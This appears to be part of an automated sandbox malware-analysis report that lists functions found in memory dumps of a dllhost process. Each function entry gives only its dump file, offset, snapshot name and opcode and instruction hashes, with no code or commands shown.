Function 04BC2867 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c37ea89f0f30acafb4f2e46e823bb867b7624925d6481bb95cf2e6c7e7c931
Instruction ID: 0d52d3ed3a230573285c0dde3b59907c0f48f30e33624d33b435ffa0b1292eaf
Opcode Fuzzy Hash: 46c37ea89f0f30acafb4f2e46e823bb867b7624925d6481bb95cf2e6c7e7c931
Instruction Fuzzy Hash: CA112E35F403248BDB186BB5D86C36E36E1BB59751F0445B9D987E73E0EE689C00CB51

Function 04BC59AB Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 440130938f5dbc641ed95c05ef553c41ce6bb6d024c15816be26e314ca2de0d2
Instruction ID: 801aa8aefe325eb021fb6bddf14b55f746acd5bbca928ade49d949979cd0bb40
Opcode Fuzzy Hash: 440130938f5dbc641ed95c05ef553c41ce6bb6d024c15816be26e314ca2de0d2
Instruction Fuzzy Hash: 98117C35E00024ABDB24DBA8C5885DCF7B1FF58320B5585EAC955A7220E7B0BC41CBA0

Function 04BC2984 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c867540987cbcac3d2df2ac61ee02f070f3d5c31eeec03d14074140026b7d127
Instruction ID: f0a697269cf8b9f6a25ddc80a0dade4a9bf1482778e1df6f903a6bbc31ae2d77
Opcode Fuzzy Hash: c867540987cbcac3d2df2ac61ee02f070f3d5c31eeec03d14074140026b7d127
Instruction Fuzzy Hash: FF112A35F403208BEB186BB5D86C36E36E2BB59751F0445B9E987E73E0EE689C00CB51

Function 04BC29C5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ad65da66673d74e30be09b8438273c6236817e18dcd6d7173f4edd9766fa5d
Instruction ID: 61a346072d474168ce3d7bd37a2229925c78175f3a6695701243505cffd6f009
Opcode Fuzzy Hash: 38ad65da66673d74e30be09b8438273c6236817e18dcd6d7173f4edd9766fa5d
Instruction Fuzzy Hash: 3E111835F403248BEB186BB5D85C3AE36E2BB59751F0445B9E987E73E0EE689C00CB51

Function 04BC2973 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f60c04e9d8eb10c5f583fb3a8f886476aaec0c10b6cd06334ac9ee090477c1e8
Instruction ID: 45300ddaba0263e0d506f221209275639dcddea7610349ee04d91629db0eb773
Opcode Fuzzy Hash: f60c04e9d8eb10c5f583fb3a8f886476aaec0c10b6cd06334ac9ee090477c1e8
Instruction Fuzzy Hash: A3112E35F403248BDB186BB5D85C36E36E1BB59751F0445B9D987E73E0EE689C00CB51

Function 04BC2ACD Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42e2f8305877a9f481b376e37ad3d712f78003e09390c627b80108b9325bb299
Instruction ID: a5010b124b91a612829469a0dc43f5dd232fcdf9be88e292169c13ea4e5a11a0
Opcode Fuzzy Hash: 42e2f8305877a9f481b376e37ad3d712f78003e09390c627b80108b9325bb299
Instruction Fuzzy Hash: A4112A35F403208BEB186BB5D85C36E36E2BB59751F0445B9E987E73E0EE689C00CB51

Function 04BC2BD3 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418f11bb9e102d344ce2ab66ebd91add62255adc54990296581d326f958e9151
Instruction ID: 828d86fe4ef959814f8c401808bd1558e27359bf8456445ede8e2646984b97c8
Opcode Fuzzy Hash: 418f11bb9e102d344ce2ab66ebd91add62255adc54990296581d326f958e9151
Instruction Fuzzy Hash: 32115A34F003208BEB186BB5D85C3AE36E2BB59351F0445B9E887E73E0EE689C00CB51

Function 079D2318 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3882277995.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 494af687ca071e0e5e0439985ee40bfa64161f570338c6e9603da4adac6fb861
Instruction ID: 01408206fce82116efcc2414f2fbd3d2d1fed5065f3f7bdaff9d0c5917f3a1bb
Opcode Fuzzy Hash: 494af687ca071e0e5e0439985ee40bfa64161f570338c6e9603da4adac6fb861
Instruction Fuzzy Hash: F011FEB5908301AFD350CF09DC40E57FBE8EB88660F04882EFD5897311E235E9148FA2

Function 00810AA4 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863197176.0000000000810000.00000040.00000020.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_810000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8c79fea768bbdceba8a775d905ba292f387b57111c7ca1b796a47fbbeb61d1
Instruction ID: 7bbc93839796eedd234333d119d209b63f37a97655b6872db16ac388e42ca4ea
Opcode Fuzzy Hash: cc8c79fea768bbdceba8a775d905ba292f387b57111c7ca1b796a47fbbeb61d1
Instruction Fuzzy Hash: 2D114C3014D3C48FCB12CB10C990B55BFB1EF46718F2885EED4898B6A3C37A9846DB51

Function 0084B614 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863423430.0000000000842000.00000040.00000800.00020000.00000000.sdmp, Offset: 00842000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_842000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 274b42429cef0ce0b933021656cb9579e021f90159f3eeffd474909d429d83dc
Instruction ID: b5cd9def78c7c657bcd05ec85dcc93e898f228bbbd64d718ebd64f4327141a93
Opcode Fuzzy Hash: 274b42429cef0ce0b933021656cb9579e021f90159f3eeffd474909d429d83dc
Instruction Fuzzy Hash: 6D11FAB5908301AFD350CF09DC40E57FBE8EB88660F04892EFD5897311E235E9188FA2

Function 04BC46B8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b367c4c4baa9210dc1c328d7622ef0a7e785235a8aeaa77ed4b1d4fbdcff187b
Instruction ID: ec42492a1f1b2477e6dc69624fb5e074a4b072ba68d39e6633f0acb6faa08c8b
Opcode Fuzzy Hash: b367c4c4baa9210dc1c328d7622ef0a7e785235a8aeaa77ed4b1d4fbdcff187b
Instruction Fuzzy Hash: 5E011E35F006188FCF44EBB8E8585ADBBF6EB8D254B504439D51AE7364EE705C008B55

Function 008105DF Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863197176.0000000000810000.00000040.00000020.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_810000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad76fb8acb831b1fa3cf73f7b80441cf1a65acd10f36731c9f185f5c47c48558
Instruction ID: 123e1a40f8b973a62f0a9c9c69ec3cc19a74d202f113f4c46cd29e42d1d2522d
Opcode Fuzzy Hash: ad76fb8acb831b1fa3cf73f7b80441cf1a65acd10f36731c9f185f5c47c48558
Instruction Fuzzy Hash: 21F0A9B65497805FD7118F16DC40863FFE8EB8A620709C4AFED4D8B652D175B904CB72

Function 04850007 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6cfd844a28a220399689c4b05a9efda61f06d1044749b3237da6d98de2ae95
Instruction ID: 4407192fc1b8225b26569e6ee4312fded43bc760c2b1cd1fed96961149bf6fa0
Opcode Fuzzy Hash: 9f6cfd844a28a220399689c4b05a9efda61f06d1044749b3237da6d98de2ae95
Instruction Fuzzy Hash: D701529984FBC69FCB2387B41C706883FB06E13018B4E81DBC480CA4E3D21D4A5ACB23

Function 04BC48C0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1fa2c9d9a7f9c4155a422e3d462654f389a6a13cfa24556453a473222d740d
Instruction ID: 8a2f308c8a53efc62e7bfe7f7150e92f52894f29d0289e163d74af50d74a5c34
Opcode Fuzzy Hash: 0b1fa2c9d9a7f9c4155a422e3d462654f389a6a13cfa24556453a473222d740d
Instruction Fuzzy Hash: B6F0AF70E492888FCF00DFB898546EEBFF5EB89200F10417FD505E3692E6354A06CBA2

Function 04BC54F5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 775e097c13060beca1f72347cc615435d5f33df146a1f9d100695fd55ee2e551
Instruction ID: cbd1553217d27aaac00276a79f5569262358f181ac707e7f2d781ebc034933be
Opcode Fuzzy Hash: 775e097c13060beca1f72347cc615435d5f33df146a1f9d100695fd55ee2e551
Instruction Fuzzy Hash: 07F0C0E2C5A6853BC30611991CDBA9F7FD894A9440F4745D6EE499726371043A2741E3

Function 00810B80 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863197176.0000000000810000.00000040.00000020.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_810000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebc5b6732729a339265089b62efc3c6bace0e7d6289c11fcde96120f8fea70b
Instruction ID: 334288f50f32f58477c4bd67ff877652d01e1b422f3795201b136f7baf661d8c
Opcode Fuzzy Hash: 9ebc5b6732729a339265089b62efc3c6bace0e7d6289c11fcde96120f8fea70b
Instruction Fuzzy Hash: C6F04B35108684DFC201CB00C980B15FBA6FB88718F24C6A9E94907662C7779852DA81

Function 04BC3AF8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9157ecde8f194b2497ea614c434ab0a069bbb6d86d5df00cd90d094c44bb2593
Instruction ID: 0f215ea7ca30b1533e55c4ff1e51afa762ceb321af4d86e7a924031766c77d24
Opcode Fuzzy Hash: 9157ecde8f194b2497ea614c434ab0a069bbb6d86d5df00cd90d094c44bb2593
Instruction Fuzzy Hash: C9F082307046418AFB24BF7C84C437D25D1AB41228F94A79DEE62D71F0EF6479818B6B

Function 04856D38 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 864cfe5b9666c833436a2d8589cc43d64b90b603e23c13d5c268f58f42158500
Instruction ID: 7f932d2d69befab8110db1891c802225666800ce5fc7a0fe78a6668901e31d47
Opcode Fuzzy Hash: 864cfe5b9666c833436a2d8589cc43d64b90b603e23c13d5c268f58f42158500
Instruction Fuzzy Hash: BAF0E234609388AFC7128730AC0C3597F69AB83204F0445D9DC05CB2A3EF656A04C362

Function 0485206F Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf37f158caf9d428e778668d61b7550d0d749d66bba1f86c08a9fd0778a5ec1e
Instruction ID: b9d2b732fef339a0caca663a4817b52239bcd96e0a900e510ea55ba36bd05de8
Opcode Fuzzy Hash: bf37f158caf9d428e778668d61b7550d0d749d66bba1f86c08a9fd0778a5ec1e
Instruction Fuzzy Hash: ECF04979A05258CBCB589F24D8A876CBBB1FB85301F1089A5EC46D33A4DE749E84CF81

Function 04851704 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ab53495f3f71de5cb58f361cb82782995806b7df17b2f492b687832777b64b
Instruction ID: 042f4b237a1747fccc118e07d24428bbdc805e75f9ecc9df990f00ef6d79ecba
Opcode Fuzzy Hash: 42ab53495f3f71de5cb58f361cb82782995806b7df17b2f492b687832777b64b
Instruction Fuzzy Hash: A7F01DB8B05159DBDB148F34DD587ACBBB1BB8A300F0489A5E90AE22A0DF749F44CF41

Function 04BC4BE0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6d846f60b5c64edb7bd0262beb45deb38b979365821bda0263fb3519f2de3a
Instruction ID: 1169c9be8718d970563fe7ff59c60a1156fa49a7c580384602e6d4b2077fdc91
Opcode Fuzzy Hash: 8c6d846f60b5c64edb7bd0262beb45deb38b979365821bda0263fb3519f2de3a
Instruction Fuzzy Hash: 2DF0153148E3C89FC31347751C615593F744D9311831A42EFD5888F8F3D66AC96AC7A6

Function 00810606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863197176.0000000000810000.00000040.00000020.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_810000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 906b66f1b5de2039156822fd712d5ab111d02387ea7a9d360216cc4bc2596234
Instruction ID: 52a0afd14b654433d8f5b36d9bc57ad1c53f79763901af3bfcefffb697ae6def
Opcode Fuzzy Hash: 906b66f1b5de2039156822fd712d5ab111d02387ea7a9d360216cc4bc2596234
Instruction Fuzzy Hash: B1E092B66446004B9650CF0BEC41452F7D8EB88630708C07FEC0D8BB01E275B504CAB5

Function 04BC2430 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 628ccad23a8e9e2b3a27bf9b03e2c9ea3177c2aac0d634d9b27c0b1975746a91
Instruction ID: 96e8c6845511ad35af4252906334b47d4983cff0bf8ba0b120658be81a772840
Opcode Fuzzy Hash: 628ccad23a8e9e2b3a27bf9b03e2c9ea3177c2aac0d634d9b27c0b1975746a91
Instruction Fuzzy Hash: 54E086313883942BE21211596C16B9AB7998BC7B55F1640A7F204DF6D2CAC55C4643BA

Function 048515D9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e468d5eebd2fd645c2d5ce8a2b398b63c5739796ff4253ecdbd7f6c3112020
Instruction ID: 76df1d52c0b74904f7d3c849dc218c4d3f81639d08532d3a400cb7b44591a172
Opcode Fuzzy Hash: e5e468d5eebd2fd645c2d5ce8a2b398b63c5739796ff4253ecdbd7f6c3112020
Instruction Fuzzy Hash: B0017EB4D0022DDFCB60CF14CD80BD9B7B5BB4A204F0081EA9A4EA3211EB316E84DF59

Function 04856D48 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a93edf62409a0ef0d8289b5bf6724860031685300de1079ad64c33ac782749
Instruction ID: cdac4adcfa050ecdd26802cbe2c6be5c9e97885f74c0c876bdd3c579103fdaad
Opcode Fuzzy Hash: 96a93edf62409a0ef0d8289b5bf6724860031685300de1079ad64c33ac782749
Instruction Fuzzy Hash: 3FF02B38B00208DBCB24ABB0B81D368779AFB86705F000968DE06C3391EFB66E44C352

Function 079D1D8B Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3882277995.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d243d3ddc35dbf35c4867f52fc17ee1053827ad2e527cdc75c825a9d75d748
Instruction ID: 2e01bd1a678be082a86822200f78d2ab3bac49192e8566f2e7ed42f045e20428
Opcode Fuzzy Hash: 37d243d3ddc35dbf35c4867f52fc17ee1053827ad2e527cdc75c825a9d75d748
Instruction Fuzzy Hash: ACE0D8B29402006BD2109E069C45F53FB9CEB84930F08C46BEE081B702E176B514CDF5

Function 079D2367 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3882277995.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee65530d9917ae2fb940fe6c4726ba598356d5c6b0c6a6403c264032a7b671b
Instruction ID: 06528a271e94479c9e306a573b3bdaebd7ffd631d85316c3839551e4619c8a22
Opcode Fuzzy Hash: 5ee65530d9917ae2fb940fe6c4726ba598356d5c6b0c6a6403c264032a7b671b
Instruction Fuzzy Hash: 3BE0D8B29402046BD2509E069C45F53FB9CEB44930F08C467EE0C1B702E176B5148AF5

Function 079D24DF Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3882277995.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_79d0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b48192febe0f5ac2e55211ccb5693c187d44db83e6c977944bef95b6a199d09
Instruction ID: 071b0ec78e30606cdbe4ba02b985524a5b73d702d4781c33cd9762488137b739
Opcode Fuzzy Hash: 8b48192febe0f5ac2e55211ccb5693c187d44db83e6c977944bef95b6a199d09
Instruction Fuzzy Hash: D1E0D8F29402006BD2108E069C45F63FB9CEB94931F08C467EE081B742E175B51489F5

Function 0084B663 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863423430.0000000000842000.00000040.00000800.00020000.00000000.sdmp, Offset: 00842000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_842000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 294daac83cb631217d42cc2d2d3578e0915f3b8a7cfd71803c5b6bb45d25ab2f
Instruction ID: fb3302bb88b759ae4fdb740ec58f764f988762c2466a3482206ba338d648587d
Opcode Fuzzy Hash: 294daac83cb631217d42cc2d2d3578e0915f3b8a7cfd71803c5b6bb45d25ab2f
Instruction Fuzzy Hash: F5E0D8B29402046BD2108E06AC45F53F79CEB54A31F08C567EE081B702E175B51489F5

Function 0485A298 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004858000.00000040.00000800.00020000.00000000.sdmp, Offset: 04858000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4858000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acbb2f4b3cbc18a786eddb09df5cb079f3c30a5f1b2f0e5cbfc06f9f9b092ca9
Instruction ID: 23d40e44bc34e9a4eef2efb2bf71f10eeb5a7347dec088489a9713307d401870
Opcode Fuzzy Hash: acbb2f4b3cbc18a786eddb09df5cb079f3c30a5f1b2f0e5cbfc06f9f9b092ca9
Instruction Fuzzy Hash: EFE09A3504D3C8AFC7032B64A800A583FA8AF4311470A40E3EC88CF5B3C2229928D772

Function 04BC4C0A Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aea8e1a453c54512ed58baf0e1fa3782bf82d0fbf3d05cfb917fa6d06714982
Instruction ID: aee80e1601f08d879b7114d71fd31acdabf91866a8a44b0ef4927be31a06fced
Opcode Fuzzy Hash: 7aea8e1a453c54512ed58baf0e1fa3782bf82d0fbf3d05cfb917fa6d06714982
Instruction Fuzzy Hash: 8FE0EC6109EBC84FC30753712D616643FB84D4302575B00EBD988CF8F3D62A9968D366

Function 04BC1B28 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a910b6674c9f3bade2689d2980daba6e64df2ee85cfb081c18344ce2b08c1b48
Instruction ID: 12c6647c4630e5642b95a26537756d5cb912a6b89abf6577c5c8068e810024c1
Opcode Fuzzy Hash: a910b6674c9f3bade2689d2980daba6e64df2ee85cfb081c18344ce2b08c1b48
Instruction Fuzzy Hash: 45F0D478B017149FEB149B74DC8C69D7AB2BF8A301F400499A84AAB291DF785A80CF02

Function 04BC2440 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc9ba508560de58219a5c936d98bc4351d12dd9e6f4dd9c92ac89c989b8672ff
Instruction ID: e4ed2e334b6930d985c8631701d98cf2f3d42c2d6adb038f7da1ab4b4ba2e566
Opcode Fuzzy Hash: dc9ba508560de58219a5c936d98bc4351d12dd9e6f4dd9c92ac89c989b8672ff
Instruction Fuzzy Hash: 77D0C72178436433E425119D7C13FAA624D87C6FA5E154076F704DF7C4CDC15D4542E9

Function 0485E81C Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1895d07fca86c84ade748cfa1ec247d850413e3c7afcf81f26bdeb4a127a933c
Instruction ID: 649a2395b4932582679b39c1dd76b3fbbc494a4f307fa5b6c3d7cd0f0bd78755
Opcode Fuzzy Hash: 1895d07fca86c84ade748cfa1ec247d850413e3c7afcf81f26bdeb4a127a933c
Instruction Fuzzy Hash: 9FE0C038A00609CFE758AB64DC5CB6C7771BF49305F40456AD80AE33A4EE741A40CF21

Function 04853A05 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb35311d580f4fd7505885919f9a2566b26e988a99b4a8a966540533eec69ed
Instruction ID: 4cfacfcb82a256c33990fe25946cbad59b2f418d7604f74047a69158dd0fbb0d
Opcode Fuzzy Hash: 7cb35311d580f4fd7505885919f9a2566b26e988a99b4a8a966540533eec69ed
Instruction Fuzzy Hash: C8E08C357041A4CBEB409B1CC91539C32E0AB09354F088AA6EC06DB292CB39AD408F87

Function 04852E1A Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9c665f34b7e1bdca13d82a0eb8a219ad1675bda83e1a770900de0b5c797a7f
Instruction ID: 823b1d1cdd5149f02033655d632333af1f4206fbd3a0d7d48e5ab16e2c43fd7b
Opcode Fuzzy Hash: 3b9c665f34b7e1bdca13d82a0eb8a219ad1675bda83e1a770900de0b5c797a7f
Instruction Fuzzy Hash: 77E08C39A04251EFEB049F64EC1876D77A8FB09350F0849B6AC4AC3390EA385E40CF62

Function 04BC58E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f26e3735311c44a0d5a085c0f00bf1984c9b34f052476f24b038d1bbc425889
Instruction ID: 9c80011124d57237c208dec89b21d616f3c9d5c0576f4382f11e34ac5a3bb163
Opcode Fuzzy Hash: 1f26e3735311c44a0d5a085c0f00bf1984c9b34f052476f24b038d1bbc425889
Instruction Fuzzy Hash: C3E042252DF3D11EC70743641C6449D2F76484305434E46EBD085CF9F3D55DE51A83A6

Function 04BC73D8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
